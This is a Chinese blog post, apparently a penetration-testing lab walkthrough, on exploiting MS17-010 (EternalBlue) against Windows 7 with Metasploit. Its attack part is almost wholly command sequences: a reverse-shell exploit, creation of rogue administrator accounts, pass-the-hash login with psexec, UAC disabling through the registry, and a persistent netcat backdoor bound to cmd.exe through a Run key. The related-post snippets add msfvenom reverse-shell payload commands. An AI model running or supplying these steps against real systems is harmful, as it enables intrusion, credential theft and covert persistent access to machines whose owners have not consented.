msf利用ms17-010永恒之蓝获取win7 shell并留后门

最新推荐文章于 2024-07-14 17:22:12 发布
最新推荐文章于 2024-07-14 17:22:12 发布
阅读量4.4k 收藏 41
点赞数 7
分类专栏: 渗透测试 msf 文章标签: 安全 shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43102772/article/details/104331756
版权

思路
1.判断靶机是否存在ms17-010漏洞
2.攻击靶机获得shell
3.创建用户账号(知道原账号、密码则可省了,直接用原用户账号代替)
4.留后门

实验开始:
一:判断靶机是否存在ms17-010漏洞

sf5 > use exploit/windows/smb/ms17_010

二:攻击靶机获得shell
1.调用ns17-010永恒之蓝
2.设置payload
3.设置lhost、rhost等参数,跟情况而定。
4.run/exploit

设置exploit攻击模块、payload攻击载荷模块

sf5 > use exploit/windows/smb/ms17_010_eternalblue 
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.72.131
lhost => 192.168.72.131
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.72.128
rhosts => 192.168.72.128
5 exploit(windows/smb/ms17_010_eternalblue) > run

得到以下结果,攻击成功
在这里插入图片描述
查看下此用户的权限

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

三、创建用户账号
到此靶机就攻击成功了。接下来可以创建用户账号了。创建账号有两种方式。
方式一:利用msf的post后渗透攻击模块,直接在meterpreter下创建,这种创建的账号直接就是administrators权限。

meterpreter > run post/windows/manage/enable_rdp

在这里插入图片描述

meterpreter > run post/windows/manage/enable_rdp USERNAME=test PASSWORD=123456

在这里插入图片描述
方法二:通过shell进入靶机,在靶机里创建用户账号。

meterpreter > shell
C:\Windows\system32>net user test1 123456 /add 
C:\Windows\system32>net localgroup administrators test1 /add
C:\Windows\system32>net user test1

通过创建用户,添加到administrators用户组,创建出来的用户账号也是administrators权限。
在这里插入图片描述
此时你就可以远程登录靶机,登录靶机的方式依然有两种。
第一种:远程桌面登录

root@kali:~# rdesktop 192.168.72.128

在这里插入图片描述
在这里插入图片描述
第二种:SAM值登录
SAM值登录要注意以下几点:
1.获取SAM密码
2.关闭windows的UAC
3.psexec模块连接登录

1.hashdump获取密码
在这里插入图片描述
2.关闭UAC
关闭UAC需要重启才生效
关闭UAC方式一:
链接:link
http://www.win7zhijia.cn/jiaocheng/win7_26850.html
关闭UAC方式二:

meterpreter > shell

C:\Windows\system32>cmd.exe /k %windir%\System32\reg.exe ADD
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t
REG_DWORD /d 0 /f

参数说明
ADD 添加一个注册表项
-v 创建键值
-t 键值类型
-d 键值的值

3.psexec模块连接登录

msf5 exploit(windows/smb/webexec) > use exploit/windows/smb/psexec
msf5 exploit(windows/smb/psexec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/psexec) > set lhost 192.168.72.131
lhost => 192.168.72.131
msf5 exploit(windows/smb/psexec) > set rhosts 192.168.72.128
rhosts => 192.168.72.128
msf5 exploit(windows/smb/psexec) > set smbuser test
smbuser => test
msf5 exploit(windows/smb/psexec) > set smbpass aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
smbpass => aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
msf5 exploit(windows/smb/psexec) > set smbdomain workgroup
smbdomain => workgroup
msf5 exploit(windows/smb/psexec) > run

如果UAC没关此时就会出现Exploit failed [no-access]: RubySMB::Error::UnexpectedStatusCode STATUS_ACCESS_DENIED的状况。
在这里插入图片描述
关闭UAC的后登录成功截图
在这里插入图片描述
至此远程登录靶机就成功了。

四、留后门
1.关闭UAC(以上已关闭)
2.开启win7主机默认共享,以便于远程执行命令。
3.上传瑞士军刀nc.exe到windows主机上。
4.将nc添加到开机启动项
5.开启windows443端口
6.重启,测试后门。

1.关闭UAC,以上步骤已做
2.开启win7主机默认共享

C:\Windows\system32> cmd.exe /k %windir%\System32\reg.exe ADD
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v
LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

3.上传nc.exe到windows中
注:kali中集成了nc.exe,默认在/usr/share/windows-binaries/nc.exe下。上传到system32是便于隐藏。如果win7是64位的,那么你上传到system32的文件回默认被转到syswow64文件夹中区。但这不影响。

meterpreter > upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32

4.将nc添加至启动项

meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe'

5.开放win7 443端口

C:\Windows\system32> netsh firewall add portopening TCP 443 "xuegod443" ENABLE

6.重启win7并测试后门
强制重启

C:\Windows\system32>shutdown -r -f -t 0

测试后门

root@xuegod53:~# nc -v 192.168.72.128 443

能重新进入则后门留成功。

Benjiamin D
关注
专栏目录
MSF生成后门汇总
干铮的博客
10-10 4819
可执行脚本反弹shell 1.windows下exe执行文件后门 msfvenom -p windows/meterpreter/reverse_tcp LHOST=监听端ip地址 LPORT=监听端端口 x >文件路径/文件名 案例:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.193 LPORT=4444 x >/shell.exe 监听设置: msfconsole use exploit/mul...
Windows后门——隐藏用户+Shift后门
G6_12的博客
06-19 1149
后门是攻击者出入系统的通道,惟其如此它隐蔽而危险,攻击者利用后门技术如入无人之境
MSF利用ms17_010实验
谭宇
03-24 1811
ubuntu尝试ms17010漏洞的实验 该漏洞具有非常大的危害性,这个漏洞导致攻击者在目标系统上可以执行任意代,包括格式化电脑删除重要的内容。 当然漏洞非常的古老了,防范只需要打个补丁,再不济关闭445端口。 安装 首先打开终端输入 curl https://raw.githubusercontent.com/rapid7/metasploit-omni...
通过Metasploit实现MS17-010永恒之蓝漏洞)的复现学习
最新发布
Time_worm的博客
07-14 796
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
MSF实战制作deb软件包后门
永远是少年
06-13 492
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF实战制作deb软件包后门。 一、deb恶意软件包制作 二、效果检验
windows中利用放大镜后门
whoim_i的博客
02-19 3524
前文有介绍到利用sethc后门,这里在记录利用windows中放大镜后门,与之前的sethc有异曲同工之妙。 那么废话,咱们直接开干 本次实验环境采用虚拟机win7系统,首先进入bios系统设置系统启动项。如图所示,将cd-rom调至第一项,然后F10保存退出。 接下来系统启动进入到安装界面,直接点击下一步 点击修复计算机选项 这里需要记住系统盘号,以便后面查找放大镜程序的位置。我这里盘号...
MSF针对FTP的后门攻击危害
永远是少年
06-07 858
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF针对FTP的后门攻击危害。 一、模块使用 二、参数设定与执行 三、结果查看
MSF初探: ms17-010win7进行渗透(传说中的永恒之蓝
梦想专栏
07-30 2480
1、https://blog.csdn.net/xiaopan233/article/details/82808386 2、 https://blog.csdn.net/qq_38240166/article/details/79476678 [rhosts 目标机 lhost 原始攻击机] remoter hosts / local host 在meterpreter 下输入s...
ms17-010 永恒之蓝漏洞复现+抓包分析+使用mimikatz抓取密码
weixin_48710435的博客
08-05 2674
一、实验环境: 1、攻击机:KaliIP:192.168.218.157 1)攻击工具:msf 2)分析工具:wireshark 2、靶 机:Windows7(旗舰版) IP:192.168.218.160 1)开启网络共享(SMB协议) 2)关闭防火墙 3、网卡连接方式:Vmnet8(NAT) 二、实验步骤: 1、测试攻击机与靶机的连通性 2.进行MS17-010漏洞扫描 1)启动msf 命令:msfconsole ...
msf通过win7ms17-010永恒之蓝”进行渗透测试
weixin_41023533的博客
11-24 3331
msf通过win7ms17-010永恒之蓝”进行渗透测试 一.查找该漏洞 二.使用该漏洞的探测模块(auxiliary/scanner/smb/smb_ms17_010),对目标主机进行‘是否存在该漏洞’的检查 三.使用该漏洞的攻击模块进行攻击(use exploit/windows/smb/ms17_010_eternalblue) 四.创建新用户,并进行远程连接(方法一) 使用enable_rdp脚本开启远程桌面并创建用户 1.开启远程桌面:run post/windows/manage/en
永恒之蓝(MS17-010)漏洞复现及msf常用渗透命令
Fengsheng96的博客
08-10 2610
环境部署 靶机:win7 工具机:kali,nessus 攻击步骤 1、nessus扫描靶机 根据扫描结果查看漏洞
永恒之蓝检测工具MS17-010漏洞扫描工具 (全网段)
10-05
MS17-010漏洞扫描工具,在公司,或网吧,机器多的可以直接扫描 可直接输入指定的服务器,或客机扫描
Kali Linux:用永恒之蓝对 Windows 7 进行渗透并揭密勒索病毒攻击方法
GitChat
02-05 5786
提示:本文章内所有内容环境为自己搭建绝无违法内容,请不要利用其中的技术来做违法的事情。 声明:法律问题与本作者无关,请自觉遵守! 实施利用 Kali Linux 对 Windows7 SP1 进行永恒之蓝操作,所以操作将在虚拟机上完成。...
组策略错误没有权限执行此操作_Metasploit PSExec执行报错大全
weixin_39915815的博客
11-22 4424
声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。所有话题标签:#Web安全 #漏洞复现 #工具使用 #权限提升#权限维持#防护绕过#内网安全 #实战案例#其他笔记 #资源分享 ...
MSF使用总结
qq_44657899的博客
09-25 4568
文章目录生成小马文件运行小马维持会话 生成小马文件 msfvenom -p windows/meterpreter/reverse_tcp LHOST=服务器IP LPORT=服务器监听端口 -f exe -o test.exe 生成的小马在root目录下 运行小马 // 进入msf msfconsole // 监听 use exploit/multi/handler // 设置payload set payload windows/meterpreter/reverse_tcp // 设置 s
实战ms17_010_psexec远程控制漏洞入侵Windows server 2003
hih30250的博客
11-06 1006
本篇文章记录使用metasploit利用Windows的远程控制漏洞攻击获取shell权限的过程。
Windows网络服务渗透测试实战MS17-010漏洞复现
c_lanxiaofang的博客
05-16 3491
一、实验项目名称 Windows网络服务渗透测试实战MS17-010漏洞复现 二、实验目的及要求 熟悉Metasploit终端的使用方法; 掌握对MS17-010漏洞攻击的方法。 三、复现步骤(附加文字说明加截图) 1、NAT模式 Kali-Linux :192.168.232.141 Windows 7: 192.168.232.142 2、查看ip kali:ip a win7:ipconfig 3、重启网卡 service networking restart 4、测试是否连通 k
ms17-010永恒之蓝) 漏洞复现与处理
热门推荐
diaobusi的博客
06-05 1万+
ms17_010 是一种操作系统漏洞,仅影响 Windows 系统中的 SMBv1 服务。这个漏洞是由于 SMBv1 内核函数中的缓冲区溢出而导致的。攻击者可以通过该漏洞控制目标系统,并执行任意代码。这个漏洞通过 445 文件共享端口进行利用,一旦攻击者成功利用该漏洞,就可以在目标主机上植入各种恶意软件,如勒索软件。最近出现的 WannaCry 勒索软件就使用 ms17_010 漏洞来传播和植入勒索代码,将目标系统中的所有文件加密并威胁用户付款。
MSF给正常程序添加后门
永远是少年
06-10 1575
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF给正常程序添加后门。 一、后门制作 二、监听开启 三、效果检验 (一)软件查杀测评 (二)软件效果检验
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值